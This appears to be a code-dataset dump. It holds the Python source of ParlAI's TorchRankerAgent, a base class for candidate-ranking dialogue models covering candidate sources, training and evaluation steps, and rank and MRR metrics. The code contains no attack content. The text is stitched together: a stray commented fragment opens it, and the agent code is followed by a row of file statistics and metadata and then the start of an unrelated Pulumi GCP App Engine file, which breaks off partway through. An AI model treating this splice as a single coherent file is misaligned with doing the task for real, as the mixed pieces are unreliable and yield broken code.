# Convert a batch of candidates from text to vectors.
#
# :param cands_batch:
# a [batchsize] list of candidates (strings)
# :returns:
# a [num_cands] list of candidate vectors
#
# By default, candidates are simply vectorized (tokens replaced by token ids).
# A child class may choose to overwrite this method to perform vectorization as
# well as encoding if so desired.
# """
# return [
# self._vectorize_text(
# cand,
# truncate=self.label_truncate,
# truncate_left=False,
# add_start=add_start,
# add_end=add_end,
# )
# for cand in cands_batch
# ]
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Torch Ranker Agents provide functionality for building ranking models.
See the TorchRankerAgent tutorial for examples.
"""
from typing import Dict, Any
from abc import abstractmethod
from itertools import islice
import os
from tqdm import tqdm
import random
import torch
from parlai.core.opt import Opt
from parlai.utils.distributed import is_distributed
from parlai.core.torch_agent import TorchAgent, Output
from parlai.utils.misc import warn_once
from parlai.utils.torch import (
padded_3d,
total_parameters,
trainable_parameters,
PipelineHelper,
)
from parlai.utils.fp16 import FP16SafeCrossEntropy
from parlai.core.metrics import AverageMetric
class TorchRankerAgent(TorchAgent):
"""
Abstract TorchRankerAgent class; only meant to be extended.
TorchRankerAgents aim to provide convenient functionality for building ranking
models. This includes:
- Training/evaluating on candidates from a variety of sources.
- Computing hits@1, hits@5, mean reciprical rank (MRR), and other metrics.
- Caching representations for fast runtime when deploying models to production.
"""
@classmethod
def add_cmdline_args(cls, argparser):
"""
Add CLI args.
"""
super(TorchRankerAgent, cls).add_cmdline_args(argparser)
agent = argparser.add_argument_group('TorchRankerAgent')
agent.add_argument(
'-cands',
'--candidates',
type=str,
default='inline',
choices=['batch', 'inline', 'fixed', 'batch-all-cands'],
help='The source of candidates during training '
'(see TorchRankerAgent._build_candidates() for details).',
)
agent.add_argument(
'-ecands',
'--eval-candidates',
type=str,
default='inline',
choices=['batch', 'inline', 'fixed', 'vocab', 'batch-all-cands'],
help='The source of candidates during evaluation (defaults to the same'
'value as --candidates if no flag is given)',
)
agent.add_argument(
'--repeat-blocking-heuristic',
type='bool',
default=True,
help='Block repeating previous utterances. '
'Helpful for many models that score repeats highly, so switched '
'on by default.',
)
agent.add_argument(
'-fcp',
'--fixed-candidates-path',
type=str,
help='A text file of fixed candidates to use for all examples, one '
'candidate per line',
)
agent.add_argument(
'--fixed-candidate-vecs',
type=str,
default='reuse',
help='One of "reuse", "replace", or a path to a file with vectors '
'corresponding to the candidates at --fixed-candidates-path. '
'The default path is a /path/to/model-file.<cands_name>, where '
'<cands_name> is the name of the file (not the full path) passed by '
'the flag --fixed-candidates-path. By default, this file is created '
'once and reused. To replace it, use the "replace" option.',
)
agent.add_argument(
'--encode-candidate-vecs',
type='bool',
default=True,
help='Cache and save the encoding of the candidate vecs. This '
'might be used when interacting with the model in real time '
'or evaluating on fixed candidate set when the encoding of '
'the candidates is independent of the input.',
)
agent.add_argument(
'--encode-candidate-vecs-batchsize',
type=int,
default=256,
hidden=True,
help='Batchsize when encoding candidate vecs',
)
agent.add_argument(
'--init-model',
type=str,
default=None,
help='Initialize model with weights from this file.',
)
agent.add_argument(
'--train-predict',
type='bool',
default=False,
help='Get predictions and calculate mean rank during the train '
'step. Turning this on may slow down training.',
)
agent.add_argument(
'--cap-num-predictions',
type=int,
default=100,
help='Limit to the number of predictions in output.text_candidates',
)
agent.add_argument(
'--ignore-bad-candidates',
type='bool',
default=False,
help='Ignore examples for which the label is not present in the '
'label candidates. Default behavior results in RuntimeError. ',
)
agent.add_argument(
'--rank-top-k',
type=int,
default=-1,
help='Ranking returns the top k results of k > 0, otherwise sorts every '
'single candidate according to the ranking.',
)
agent.add_argument(
'--inference',
choices={'max', 'topk'},
default='max',
help='Final response output algorithm',
)
agent.add_argument(
'--topk',
type=int,
default=5,
help='K used in Top K sampling inference, when selected',
)
agent.add_argument(
'--return-cand-scores',
type='bool',
default=False,
help='Return sorted candidate scores from eval_step',
)
def __init__(self, opt: Opt, shared=None):
# Must call _get_init_model() first so that paths are updated if necessary
# (e.g., a .dict file)
init_model, is_finetune = self._get_init_model(opt, shared)
opt['rank_candidates'] = True
super().__init__(opt, shared)
states: Dict[str, Any]
if shared:
states = {}
else:
# Note: we cannot change the type of metrics ahead of time, so you
# should correctly initialize to floats or ints here
self.criterion = self.build_criterion()
self.model = self.build_model()
if self.model is None or self.criterion is None:
raise AttributeError(
'build_model() and build_criterion() need to return the model '
'or criterion'
)
train_params = trainable_parameters(self.model)
total_params = total_parameters(self.model)
print(f"Total parameters: {total_params:,d} ({train_params:,d} trainable)")
if self.fp16:
self.model = self.model.half()
if init_model:
print('Loading existing model parameters from ' + init_model)
states = self.load(init_model)
else:
states = {}
if self.use_cuda:
if self.model_parallel:
self.model = PipelineHelper().make_parallel(self.model)
else:
self.model.cuda()
if self.data_parallel:
self.model = torch.nn.DataParallel(self.model)
self.criterion.cuda()
self.rank_top_k = opt.get('rank_top_k', -1)
# Vectorize and save fixed/vocab candidates once upfront if applicable
self.set_fixed_candidates(shared)
self.set_vocab_candidates(shared)
if shared:
# We don't use get here because hasattr is used on optimizer later.
if 'optimizer' in shared:
self.optimizer = shared['optimizer']
elif self._should_initialize_optimizer():
# only build an optimizer if we're training
optim_params = [p for p in self.model.parameters() if p.requires_grad]
self.init_optim(
optim_params, states.get('optimizer'), states.get('optimizer_type')
)
self.build_lr_scheduler(states, hard_reset=is_finetune)
if shared is None and is_distributed():
device_ids = None if self.model_parallel else [self.opt['gpu']]
self.model = torch.nn.parallel.DistributedDataParallel(
self.model, device_ids=device_ids, broadcast_buffers=False
)
def build_criterion(self):
"""
Construct and return the loss function.
By default torch.nn.CrossEntropyLoss.
"""
if self.fp16:
return FP16SafeCrossEntropy(reduction='none')
else:
return torch.nn.CrossEntropyLoss(reduction='none')
def set_interactive_mode(self, mode, shared=False):
super().set_interactive_mode(mode, shared)
self.candidates = self.opt['candidates']
self.encode_candidate_vecs = self.opt['encode_candidate_vecs']
if mode:
self.eval_candidates = 'fixed'
self.ignore_bad_candidates = True
self.fixed_candidates_path = self.opt['fixed_candidates_path']
if self.fixed_candidates_path is None or self.fixed_candidates_path == '':
# Attempt to get a standard candidate set for the given task
path = self.get_task_candidates_path()
if path:
if not shared:
print("[setting fixed_candidates path to: " + path + " ]")
self.fixed_candidates_path = path
else:
self.eval_candidates = self.opt['eval_candidates']
self.ignore_bad_candidates = self.opt.get('ignore_bad_candidates', False)
self.fixed_candidates_path = self.opt['fixed_candidates_path']
def get_task_candidates_path(self):
path = self.opt['model_file'] + '.cands-' + self.opt['task'] + '.cands'
if os.path.isfile(path) and self.opt['fixed_candidate_vecs'] == 'reuse':
return path
print("[ *** building candidates file as they do not exist: " + path + ' *** ]')
from parlai.scripts.build_candidates import build_cands
from copy import deepcopy
opt = deepcopy(self.opt)
opt['outfile'] = path
opt['datatype'] = 'train:evalmode'
opt['interactive_task'] = False
opt['batchsize'] = 1
build_cands(opt)
return path
@abstractmethod
def score_candidates(self, batch, cand_vecs, cand_encs=None):
"""
Given a batch and candidate set, return scores (for ranking).
:param Batch batch:
a Batch object (defined in torch_agent.py)
:param LongTensor cand_vecs:
padded and tokenized candidates
:param FloatTensor cand_encs:
encoded candidates, if these are passed into the function (in cases
where we cache the candidate encodings), you do not need to call
self.model on cand_vecs
"""
pass
def _maybe_invalidate_fixed_encs_cache(self):
if self.candidates != 'fixed':
self.fixed_candidate_encs = None
def _get_batch_train_metrics(self, scores):
"""
Get fast metrics calculations if we train with batch candidates.
Specifically, calculate accuracy ('train_accuracy'), average rank, and mean
reciprocal rank.
"""
batchsize = scores.size(0)
# get accuracy
targets = scores.new_empty(batchsize).long()
targets = torch.arange(batchsize, out=targets)
nb_ok = (scores.max(dim=1)[1] == targets).float()
self.record_local_metric('train_accuracy', AverageMetric.many(nb_ok))
# calculate mean_rank
above_dot_prods = scores - scores.diag().view(-1, 1)
ranks = (above_dot_prods > 0).float().sum(dim=1) + 1
mrr = 1.0 / (ranks + 0.00001)
self.record_local_metric('rank', AverageMetric.many(ranks))
self.record_local_metric('mrr', AverageMetric.many(mrr))
def _get_train_preds(self, scores, label_inds, cands, cand_vecs):
"""
Return predictions from training.
"""
# TODO: speed these calculations up
batchsize = scores.size(0)
if self.rank_top_k > 0:
_, ranks = scores.topk(
min(self.rank_top_k, scores.size(1)), 1, largest=True
)
else:
_, ranks = scores.sort(1, descending=True)
ranks_m = []
mrrs_m = []
for b in range(batchsize):
rank = (ranks[b] == label_inds[b]).nonzero()
rank = rank.item() if len(rank) == 1 else scores.size(1)
ranks_m.append(1 + rank)
mrrs_m.append(1.0 / (1 + rank))
self.record_local_metric('rank', AverageMetric.many(ranks_m))
self.record_local_metric('mrr', AverageMetric.many(mrrs_m))
ranks = ranks.cpu()
# Here we get the top prediction for each example, but do not
# return the full ranked list for the sake of training speed
preds = []
for i, ordering in enumerate(ranks):
if cand_vecs.dim() == 2: # num cands x max cand length
cand_list = cands
elif cand_vecs.dim() == 3: # batchsize x num cands x max cand length
cand_list = cands[i]
if len(ordering) != len(cand_list):
# We may have added padded cands to fill out the batch;
# Here we break after finding the first non-pad cand in the
# ranked list
for x in ordering:
if x < len(cand_list):
preds.append(cand_list[x])
break
else:
preds.append(cand_list[ordering[0]])
return Output(preds)
def is_valid(self, obs):
"""
Override from TorchAgent.
Check to see if label candidates contain the label.
"""
if not self.ignore_bad_candidates:
return super().is_valid(obs)
if not super().is_valid(obs):
return False
# skip examples for which the set of label candidates do not
# contain the label
if 'labels_vec' in obs and 'label_candidates_vecs' in obs:
cand_vecs = obs['label_candidates_vecs']
label_vec = obs['labels_vec']
matches = [x for x in cand_vecs if torch.equal(x, label_vec)]
if len(matches) == 0:
warn_once(
'At least one example has a set of label candidates that '
'does not contain the label.'
)
return False
return True
def train_step(self, batch):
"""
Train on a single batch of examples.
"""
self._maybe_invalidate_fixed_encs_cache()
if batch.text_vec is None and batch.image is None:
return
self.model.train()
self.zero_grad()
cands, cand_vecs, label_inds = self._build_candidates(
batch, source=self.candidates, mode='train'
)
try:
scores = self.score_candidates(batch, cand_vecs)
loss = self.criterion(scores, label_inds)
self.record_local_metric('mean_loss', AverageMetric.many(loss))
loss = loss.mean()
self.backward(loss)
self.update_params()
except RuntimeError as e:
# catch out of memory exceptions during fwd/bck (skip batch)
if 'out of memory' in str(e):
print(
'| WARNING: ran out of memory, skipping batch. '
'if this happens frequently, decrease batchsize or '
'truncate the inputs to the model.'
)
return Output()
else:
raise e
# Get train predictions
if self.candidates == 'batch':
self._get_batch_train_metrics(scores)
return Output()
if not self.opt.get('train_predict', False):
warn_once(
"Some training metrics are omitted for speed. Set the flag "
"`--train-predict` to calculate train metrics."
)
return Output()
return self._get_train_preds(scores, label_inds, cands, cand_vecs)
def eval_step(self, batch):
"""
Evaluate a single batch of examples.
"""
if batch.text_vec is None and batch.image is None:
return
batchsize = (
batch.text_vec.size(0)
if batch.text_vec is not None
else batch.image.size(0)
)
self.model.eval()
cands, cand_vecs, label_inds = self._build_candidates(
batch, source=self.eval_candidates, mode='eval'
)
cand_encs = None
if self.encode_candidate_vecs and self.eval_candidates in ['fixed', 'vocab']:
# if we cached candidate encodings for a fixed list of candidates,
# pass those into the score_candidates function
if self.fixed_candidate_encs is None:
self.fixed_candidate_encs = self._make_candidate_encs(
cand_vecs
).detach()
if self.eval_candidates == 'fixed':
cand_encs = self.fixed_candidate_encs
elif self.eval_candidates == 'vocab':
cand_encs = self.vocab_candidate_encs
scores = self.score_candidates(batch, cand_vecs, cand_encs=cand_encs)
if self.rank_top_k > 0:
sorted_scores, ranks = scores.topk(
min(self.rank_top_k, scores.size(1)), 1, largest=True
)
else:
sorted_scores, ranks = scores.sort(1, descending=True)
if self.opt.get('return_cand_scores', False):
sorted_scores = sorted_scores.cpu()
else:
sorted_scores = None
# Update metrics
if label_inds is not None:
loss = self.criterion(scores, label_inds)
self.record_local_metric('loss', AverageMetric.many(loss))
ranks_m = []
mrrs_m = []
for b in range(batchsize):
rank = (ranks[b] == label_inds[b]).nonzero()
rank = rank.item() if len(rank) == 1 else scores.size(1)
ranks_m.append(1 + rank)
mrrs_m.append(1.0 / (1 + rank))
self.record_local_metric('rank', AverageMetric.many(ranks_m))
self.record_local_metric('mrr', AverageMetric.many(mrrs_m))
ranks = ranks.cpu()
max_preds = self.opt['cap_num_predictions']
cand_preds = []
for i, ordering in enumerate(ranks):
if cand_vecs.dim() == 2:
cand_list = cands
elif cand_vecs.dim() == 3:
cand_list = cands[i]
# using a generator instead of a list comprehension allows
# to cap the number of elements.
cand_preds_generator = (
cand_list[rank] for rank in ordering if rank < len(cand_list)
)
cand_preds.append(list(islice(cand_preds_generator, max_preds)))
if (
self.opt.get('repeat_blocking_heuristic', True)
and self.eval_candidates == 'fixed'
):
cand_preds = self.block_repeats(cand_preds)
if self.opt.get('inference', 'max') == 'max':
preds = [cand_preds[i][0] for i in range(batchsize)]
else:
# Top-k inference.
preds = []
for i in range(batchsize):
preds.append(random.choice(cand_preds[i][0 : self.opt['topk']]))
return Output(preds, cand_preds, sorted_scores=sorted_scores)
def block_repeats(self, cand_preds):
"""
Heuristic to block a model repeating a line from the history.
"""
history_strings = []
for h in self.history.history_raw_strings:
# Heuristic: Block any given line in the history, splitting by '\n'.
history_strings.extend(h.split('\n'))
new_preds = []
for cp in cand_preds:
np = []
for c in cp:
if c not in history_strings:
np.append(c)
new_preds.append(np)
return new_preds
def _set_label_cands_vec(self, *args, **kwargs):
"""
Set the 'label_candidates_vec' field in the observation.
Useful to override to change vectorization behavior.
"""
obs = args[0]
if 'labels' in obs:
cands_key = 'candidates'
else:
cands_key = 'eval_candidates'
if self.opt[cands_key] not in ['inline', 'batch-all-cands']:
# vectorize label candidates if and only if we are using inline
# candidates
return obs
return super()._set_label_cands_vec(*args, **kwargs)
def _build_candidates(self, batch, source, mode):
"""
Build a candidate set for this batch.
:param batch:
a Batch object (defined in torch_agent.py)
:param source:
the source from which candidates should be built, one of
['batch', 'batch-all-cands', 'inline', 'fixed']
:param mode:
'train' or 'eval'
:return: tuple of tensors (label_inds, cands, cand_vecs)
label_inds: A [bsz] LongTensor of the indices of the labels for each
example from its respective candidate set
cands: A [num_cands] list of (text) candidates
OR a [batchsize] list of such lists if source=='inline'
cand_vecs: A padded [num_cands, seqlen] LongTensor of vectorized candidates
OR a [batchsize, num_cands, seqlen] LongTensor if source=='inline'
Possible sources of candidates:
* batch: the set of all labels in this batch
Use all labels in the batch as the candidate set (with all but the
example's label being treated as negatives).
Note: with this setting, the candidate set is identical for all
examples in a batch. This option may be undesirable if it is possible
for duplicate labels to occur in a batch, since the second instance of
the correct label will be treated as a negative.
* batch-all-cands: the set of all candidates in this batch
Use all candidates in the batch as candidate set.
Note 1: This can result in a very large number of candidates.
Note 2: In this case we will deduplicate candidates.
Note 3: just like with 'batch' the candidate set is identical
for all examples in a batch.
* inline: batch_size lists, one list per example
If each example comes with a list of possible candidates, use those.
Note: With this setting, each example will have its own candidate set.
* fixed: one global candidate list, provided in a file from the user
If self.fixed_candidates is not None, use a set of fixed candidates for
all examples.
Note: this setting is not recommended for training unless the
universe of possible candidates is very small.
* vocab: one global candidate list, extracted from the vocabulary with the
exception of self.NULL_IDX.
"""
label_vecs = batch.label_vec # [bsz] list of lists of LongTensors
label_inds = None
batchsize = (
batch.text_vec.size(0)
if batch.text_vec is not None
else batch.image.size(0)
)
if label_vecs is not None:
assert label_vecs.dim() == 2
if source == 'batch':
warn_once(
'[ Executing {} mode with batch labels as set of candidates. ]'
''.format(mode)
)
if batchsize == 1:
warn_once(
"[ Warning: using candidate source 'batch' and observed a "
"batch of size 1. This may be due to uneven batch sizes at "
"the end of an epoch. ]"
)
if label_vecs is None:
raise ValueError(
"If using candidate source 'batch', then batch.label_vec cannot be "
"None."
)
cands = batch.labels
cand_vecs = label_vecs
label_inds = label_vecs.new_tensor(range(batchsize))
elif source == 'batch-all-cands':
warn_once(
'[ Executing {} mode with all candidates provided in the batch ]'
''.format(mode)
)
if batch.candidate_vecs is None:
raise ValueError(
"If using candidate source 'batch-all-cands', then batch."
"candidate_vecs cannot be None. If your task does not have "
"inline candidates, consider using one of "
"--{m}={{'batch','fixed','vocab'}}."
"".format(m='candidates' if mode == 'train' else 'eval-candidates')
)
# initialize the list of cands with the labels
cands = []
all_cands_vecs = []
# dictionary used for deduplication
cands_to_id = {}
for i, cands_for_sample in enumerate(batch.candidates):
for j, cand in enumerate(cands_for_sample):
if cand not in cands_to_id:
cands.append(cand)
cands_to_id[cand] = len(cands_to_id)
all_cands_vecs.append(batch.candidate_vecs[i][j])
cand_vecs, _ = self._pad_tensor(all_cands_vecs)
label_inds = label_vecs.new_tensor(
[cands_to_id[label] for label in batch.labels]
)
elif source == 'inline':
warn_once(
'[ Executing {} mode with provided inline set of candidates ]'
''.format(mode)
)
if batch.candidate_vecs is None:
raise ValueError(
"If using candidate source 'inline', then batch.candidate_vecs "
"cannot be None. If your task does not have inline candidates, "
"consider using one of --{m}={{'batch','fixed','vocab'}}."
"".format(m='candidates' if mode == 'train' else 'eval-candidates')
)
cands = batch.candidates
cand_vecs = padded_3d(
batch.candidate_vecs,
self.NULL_IDX,
use_cuda=self.use_cuda,
fp16friendly=self.fp16,
)
if label_vecs is not None:
label_inds = label_vecs.new_empty((batchsize))
bad_batch = False
for i, label_vec in enumerate(label_vecs):
label_vec_pad = label_vec.new_zeros(cand_vecs[i].size(1)).fill_(
self.NULL_IDX
)
if cand_vecs[i].size(1) < len(label_vec):
label_vec = label_vec[0 : cand_vecs[i].size(1)]
label_vec_pad[0 : label_vec.size(0)] = label_vec
label_inds[i] = self._find_match(cand_vecs[i], label_vec_pad)
if label_inds[i] == -1:
bad_batch = True
if bad_batch:
if self.ignore_bad_candidates and not self.is_training:
label_inds = None
else:
raise RuntimeError(
'At least one of your examples has a set of label candidates '
'that does not contain the label. To ignore this error '
'set `--ignore-bad-candidates True`.'
)
elif source == 'fixed':
if self.fixed_candidates is None:
raise ValueError(
"If using candidate source 'fixed', then you must provide the path "
"to a file of candidates with the flag --fixed-candidates-path or "
"the name of a task with --fixed-candidates-task."
)
warn_once(
"[ Executing {} mode with a common set of fixed candidates "
"(n = {}). ]".format(mode, len(self.fixed_candidates))
)
cands = self.fixed_candidates
cand_vecs = self.fixed_candidate_vecs
if label_vecs is not None:
label_inds = label_vecs.new_empty((batchsize))
bad_batch = False
for batch_idx, label_vec in enumerate(label_vecs):
max_c_len = cand_vecs.size(1)
label_vec_pad = label_vec.new_zeros(max_c_len).fill_(self.NULL_IDX)
if max_c_len < len(label_vec):
label_vec = label_vec[0:max_c_len]
label_vec_pad[0 : label_vec.size(0)] = label_vec
label_inds[batch_idx] = self._find_match(cand_vecs, label_vec_pad)
if label_inds[batch_idx] == -1:
bad_batch = True
if bad_batch:
if self.ignore_bad_candidates and not self.is_training:
label_inds = None
else:
raise RuntimeError(
'At least one of your examples has a set of label candidates '
'that does not contain the label. To ignore this error '
'set `--ignore-bad-candidates True`.'
)
elif source == 'vocab':
warn_once(
'[ Executing {} mode with tokens from vocabulary as candidates. ]'
''.format(mode)
)
cands = self.vocab_candidates
cand_vecs = self.vocab_candidate_vecs
# NOTE: label_inds is None here, as we will not find the label in
# the set of vocab candidates
else:
raise Exception("Unrecognized source: %s" % source)
return (cands, cand_vecs, label_inds)
@staticmethod
def _find_match(cand_vecs, label_vec):
matches = ((cand_vecs == label_vec).sum(1) == cand_vecs.size(1)).nonzero()
if len(matches) > 0:
return matches[0]
return -1
def share(self):
"""
Share model parameters.
"""
shared = super().share()
shared['fixed_candidates'] = self.fixed_candidates
shared['fixed_candidate_vecs'] = self.fixed_candidate_vecs
shared['fixed_candidate_encs'] = self.fixed_candidate_encs
shared['num_fixed_candidates'] = self.num_fixed_candidates
shared['vocab_candidates'] = self.vocab_candidates
shared['vocab_candidate_vecs'] = self.vocab_candidate_vecs
shared['vocab_candidate_encs'] = self.vocab_candidate_encs
if hasattr(self, 'optimizer'):
shared['optimizer'] = self.optimizer
return shared
def set_vocab_candidates(self, shared):
"""
Load the tokens from the vocab as candidates.
self.vocab_candidates will contain a [num_cands] list of strings
self.vocab_candidate_vecs will contain a [num_cands, 1] LongTensor
"""
if shared:
self.vocab_candidates = shared['vocab_candidates']
self.vocab_candidate_vecs = shared['vocab_candidate_vecs']
self.vocab_candidate_encs = shared['vocab_candidate_encs']
else:
if 'vocab' in (self.opt['candidates'], self.opt['eval_candidates']):
cands = []
vecs = []
for ind in range(1, len(self.dict)):
cands.append(self.dict.ind2tok[ind])
vecs.append(ind)
self.vocab_candidates = cands
self.vocab_candidate_vecs = torch.LongTensor(vecs).unsqueeze(1)
print(
"[ Loaded fixed candidate set (n = {}) from vocabulary ]"
"".format(len(self.vocab_candidates))
)
if self.use_cuda:
self.vocab_candidate_vecs = self.vocab_candidate_vecs.cuda()
if self.encode_candidate_vecs:
# encode vocab candidate vecs
self.vocab_candidate_encs = self._make_candidate_encs(
self.vocab_candidate_vecs
)
if self.use_cuda:
self.vocab_candidate_encs = self.vocab_candidate_encs.cuda()
if self.fp16:
self.vocab_candidate_encs = self.vocab_candidate_encs.half()
else:
self.vocab_candidate_encs = self.vocab_candidate_encs.float()
else:
self.vocab_candidate_encs = None
else:
self.vocab_candidates = None
self.vocab_candidate_vecs = None
self.vocab_candidate_encs = None
def set_fixed_candidates(self, shared):
"""
Load a set of fixed candidates and their vectors (or vectorize them here).
self.fixed_candidates will contain a [num_cands] list of strings
self.fixed_candidate_vecs will contain a [num_cands, seq_len] LongTensor
See the note on the --fixed-candidate-vecs flag for an explanation of the
'reuse', 'replace', or path options.
Note: TorchRankerAgent by default converts candidates to vectors by vectorizing
in the common sense (i.e., replacing each token with its index in the
dictionary). If a child model wants to additionally perform encoding, it can
overwrite the vectorize_fixed_candidates() method to produce encoded vectors
instead of just vectorized ones.
"""
if shared:
self.fixed_candidates = shared['fixed_candidates']
self.fixed_candidate_vecs = shared['fixed_candidate_vecs']
self.fixed_candidate_encs = shared['fixed_candidate_encs']
self.num_fixed_candidates = shared['num_fixed_candidates']
else:
self.num_fixed_candidates = 0
opt = self.opt
cand_path = self.fixed_candidates_path
if 'fixed' in (self.candidates, self.eval_candidates):
if not cand_path:
# Attempt to get a standard candidate set for the given task
path = self.get_task_candidates_path()
if path:
print("[setting fixed_candidates path to: " + path + " ]")
self.fixed_candidates_path = path
cand_path = self.fixed_candidates_path
# Load candidates
print("[ Loading fixed candidate set from {} ]".format(cand_path))
with open(cand_path, 'r', encoding='utf-8') as f:
cands = [line.strip() for line in f.readlines()]
# Load or create candidate vectors
if os.path.isfile(self.opt['fixed_candidate_vecs']):
vecs_path = opt['fixed_candidate_vecs']
vecs = self.load_candidates(vecs_path)
else:
setting = self.opt['fixed_candidate_vecs']
model_dir, model_file = os.path.split(self.opt['model_file'])
model_name = os.path.splitext(model_file)[0]
cands_name = os.path.splitext(os.path.basename(cand_path))[0]
vecs_path = os.path.join(
model_dir, '.'.join([model_name, cands_name, 'vecs'])
)
if setting == 'reuse' and os.path.isfile(vecs_path):
vecs = self.load_candidates(vecs_path)
else: # setting == 'replace' OR generating for the first time
vecs = self._make_candidate_vecs(cands)
self._save_candidates(vecs, vecs_path)
self.fixed_candidates = cands
self.num_fixed_candidates = len(self.fixed_candidates)
self.fixed_candidate_vecs = vecs
if self.use_cuda:
self.fixed_candidate_vecs = self.fixed_candidate_vecs.cuda()
if self.encode_candidate_vecs:
# candidate encodings are fixed so set them up now
enc_path = os.path.join(
model_dir, '.'.join([model_name, cands_name, 'encs'])
)
if setting == 'reuse' and os.path.isfile(enc_path):
encs = self.load_candidates(enc_path, cand_type='encodings')
else:
encs = self._make_candidate_encs(self.fixed_candidate_vecs)
self._save_candidates(
encs, path=enc_path, cand_type='encodings'
)
self.fixed_candidate_encs = encs
if self.use_cuda:
self.fixed_candidate_encs = self.fixed_candidate_encs.cuda()
if self.fp16:
self.fixed_candidate_encs = self.fixed_candidate_encs.half()
else:
self.fixed_candidate_encs = self.fixed_candidate_encs.float()
else:
self.fixed_candidate_encs = None
else:
self.fixed_candidates = None
self.fixed_candidate_vecs = None
self.fixed_candidate_encs = None
def load_candidates(self, path, cand_type='vectors'):
"""
Load fixed candidates from a path.
"""
print("[ Loading fixed candidate set {} from {} ]".format(cand_type, path))
return torch.load(path, map_location=lambda cpu, _: cpu)
def _make_candidate_vecs(self, cands):
"""
Prebuild cached vectors for fixed candidates.
"""
cand_batches = [cands[i : i + 512] for i in range(0, len(cands), 512)]
print(
"[ Vectorizing fixed candidate set ({} batch(es) of up to 512) ]"
"".format(len(cand_batches))
)
cand_vecs = []
for batch in tqdm(cand_batches):
cand_vecs.extend(self.vectorize_fixed_candidates(batch))
return padded_3d(
[cand_vecs], pad_idx=self.NULL_IDX, dtype=cand_vecs[0].dtype
).squeeze(0)
def _save_candidates(self, vecs, path, cand_type='vectors'):
"""
Save cached vectors.
"""
print("[ Saving fixed candidate set {} to {} ]".format(cand_type, path))
with open(path, 'wb') as f:
torch.save(vecs, f)
def encode_candidates(self, padded_cands):
"""
Convert the given candidates to vectors.
This is an abstract method that must be implemented by the user.
:param padded_cands:
The padded candidates.
"""
raise NotImplementedError(
'Abstract method: user must implement encode_candidates(). '
'If your agent encodes candidates independently '
'from context, you can get performance gains with fixed cands by '
'implementing this function and running with the flag '
'--encode-candidate-vecs True.'
)
def _make_candidate_encs(self, vecs):
"""
Encode candidates from candidate vectors.
Requires encode_candidates() to be implemented.
"""
cand_encs = []
bsz = self.opt.get('encode_candidate_vecs_batchsize', 256)
vec_batches = [vecs[i : i + bsz] for i in range(0, len(vecs), bsz)]
print(
"[ Encoding fixed candidates set from ({} batch(es) of up to {}) ]"
"".format(len(vec_batches), bsz)
)
# Put model into eval mode when encoding candidates
self.model.eval()
with torch.no_grad():
for vec_batch in tqdm(vec_batches):
cand_encs.append(self.encode_candidates(vec_batch).cpu())
return torch.cat(cand_encs, 0).to(vec_batch.device)
def vectorize_fixed_candidates(self, cands_batch, add_start=False, add_end=False):
"""
Convert a batch of candidates from text to vectors.
:param cands_batch:
a [batchsize] list of candidates (strings)
:returns:
a [num_cands] list of candidate vectors
By default, candidates are simply vectorized (tokens replaced by token ids).
A child class may choose to overwrite this method to perform vectorization as
well as encoding if so desired.
"""
return [
self._vectorize_text(
cand,
truncate=self.label_truncate,
truncate_left=False,
add_start=add_start,
add_end=add_end,
)
for cand in cands_batch
]
| 42.185204 | 97 | 0.550011 | 9,428 | 83,822 | 4.723059 | 0.066928 | 0.028027 | 0.019403 | 0.014822 | 0.979339 | 0.978419 | 0.977745 | 0.977745 | 0.977745 | 0.977745 | 0 | 0.004779 | 0.355921 | 83,822 | 1,986 | 98 | 42.206445 | 0.820016 | 0.567727 | 0 | 0.294606 | 0 | 0 | 0.169112 | 0.019925 | 0 | 0 | 0 | 0.001007 | 0.001383 | 1 | 0.034578 | false | 0.002766 | 0.02213 | 0 | 0.095436 | 0.016598 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bcc3ce209d16a1f1a0aa9ad76c7aec97988e31bd | 14,152 | py | Python | sdk/python/pulumi_gcp/appengine/application_url_dispatch_rules.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_gcp/appengine/application_url_dispatch_rules.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_gcp/appengine/application_url_dispatch_rules.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ApplicationUrlDispatchRulesArgs', 'ApplicationUrlDispatchRules']
@pulumi.input_type
class ApplicationUrlDispatchRulesArgs:
def __init__(__self__, *,
dispatch_rules: pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]],
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ApplicationUrlDispatchRules resource.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]] dispatch_rules: Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
pulumi.set(__self__, "dispatch_rules", dispatch_rules)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="dispatchRules")
def dispatch_rules(self) -> pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]]:
"""
Rules to match an HTTP request and dispatch that request to a service.
Structure is documented below.
"""
return pulumi.get(self, "dispatch_rules")
@dispatch_rules.setter
def dispatch_rules(self, value: pulumi.Input[Sequence[pulumi.Input['ApplicationUrlDispatchRulesDispatchRuleArgs']]]):
pulumi.set(self, "dispatch_rules", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
